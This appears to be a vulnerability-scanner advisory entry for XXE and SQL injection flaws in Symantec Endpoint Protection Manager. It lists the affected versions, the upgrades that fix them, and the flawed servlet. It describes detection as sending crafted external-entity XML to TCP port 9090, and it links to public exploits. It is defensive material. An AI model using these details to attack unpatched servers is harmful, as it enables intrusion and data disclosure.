The host is installed with Symantec Endpoint Protection Manager and is prone to XXE and SQL injection vulnerabilities.

Successful exploitation will allow attackers to disclose potentially sensitive information, manipulate certain data, and cause a DoS (Denial of Service). Impact Level: System/Application

Upgrade Symantec Endpoint Protection Manager to version 11.0.7405.1424 or 12.1.4023.4080 or later, and Symantec Protection Center Small Business Edition to version 12.1.4023.4080 or later, For updates refer to http://www.symantec.com

Flaw is due to an error when handling XML data within the servlet/ConsoleServlet.

Symantec Endpoint Protection Manager (SEPM) 11.0 before 11.0.7405.1424 and 12.1 before 12.1.4023.4080, and Symantec Protection Center Small Business Edition 12.x before 12.1.4023.4080

Send a specially crafted XML data including external entity references to TCP port 9090 and check wheather it is able to execute commands remotely or not.

• http://packetstormsecurity.com/files/125282
• http://packetstormsecurity.com/files/125366
• http://seclists.org/bugtraq/2014/Feb/82
• http://secunia.com/advisories/56798
• http://www.exploit-db.com/exploits/31853
• http://www.exploit-db.com/exploits/31917
• http://www.osvdb.com/103305

---

Updated on 2017-03-28